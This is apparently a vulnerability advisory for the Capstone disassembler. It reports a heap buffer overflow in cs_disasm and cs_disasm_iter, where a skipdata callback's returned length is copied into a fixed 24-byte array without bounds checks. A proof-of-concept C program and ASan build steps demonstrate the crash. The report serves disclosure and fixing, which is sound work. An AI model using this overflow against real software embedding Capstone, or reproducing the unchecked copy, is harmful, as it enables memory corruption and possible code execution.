Summary

Skipdata length is not bounds-checked, so a user-provided skipdata callback can make cs_disasm/cs_disasm_iter memcpy more than 24 bytes into
cs_insn.bytes, causing a heap buffer overflow in the disassembly path.

Details

• Vulnerable code: cs_disasm skipdata fallback copies skipdata_bytes into insn_cache->bytes without capping to sizeof(insn_cache->bytes) (cs.c:1326-1339).
  The same logic exists in cs_disasm_iter (cs.c:1537-1549).
• cs_insn.bytes is a fixed 24-byte array (include/capstone/capstone.h:533-536). When a user-supplied skipdata callback returns >24,
  memcpy(insn_cache->bytes, buffer, skipdata_bytes) writes past the heap allocation for the cs_insn array.
• The API explicitly allows user-defined skipdata callbacks (cs_opt_skipdata.callback), so the overflow is attacker-controlled in any embedding that
  exposes this option.

PoC

Steps (tested on macOS, AppleClang 17, ASan):

Build ASan-instrumented library

cmake -B build-asan -DCMAKE_BUILD_TYPE=Debug
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer"
-DCMAKE_SHARED_LINKER_FLAGS="-fsanitize=address"
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
cmake --build build-asan -j4

PoC source

  cat > poc_overflow.c <<'EOF'
  #include <capstone/capstone.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  static size_t big_skip(const uint8_t *code, size_t code_size, size_t offset, void *user_data)
  {
      (void)code; (void)code_size; (void)offset; (void)user_data;
      return 1024; // larger than cs_insn.bytes (24)
  }

  int main(void)
  {
      csh handle;
      if (cs_open(CS_ARCH_WASM, CS_MODE_LITTLE_ENDIAN, &handle) != CS_ERR_OK) {
          return 1;
      }
      cs_opt_skipdata skip = { .mnemonic = ".byte", .callback = big_skip, .user_data = NULL };
      cs_option(handle, CS_OPT_SKIPDATA, CS_OPT_ON);
      cs_option(handle, CS_OPT_SKIPDATA_SETUP, (size_t)&skip);

      uint8_t buf[1024] = {0};
      buf[0] = 0x06; // invalid WASM opcode to force skipdata path
      cs_insn *insn = NULL;
      cs_disasm(handle, buf, sizeof(buf), 0, 1, &insn); // triggers memcpy overflow
      cs_free(insn, 1);
      cs_close(&handle);
      return 0;
  }
  EOF

Build and run

clang -fsanitize=address -Iinclude poc_overflow.c build-asan/libcapstone.a -o poc_overflow
ASAN_OPTIONS=halt_on_error=0:abort_on_error=0 ./poc_overflow

ASan output shows a heap-buffer-overflow in cs_disasm at the memcpy into cs_insn.bytes.

Impact

• Vulnerability type: Heap buffer overflow.
• Attack surface: Any application that uses Capstone with skipdata enabled and allows user-controlled skipdata callbacks (or untrusted plugins) can be
  exploited to corrupt heap memory, likely leading to crash or code execution in the consuming process.
• Affected APIs: cs_disasm, cs_disasm_iter skipdata path across architectures.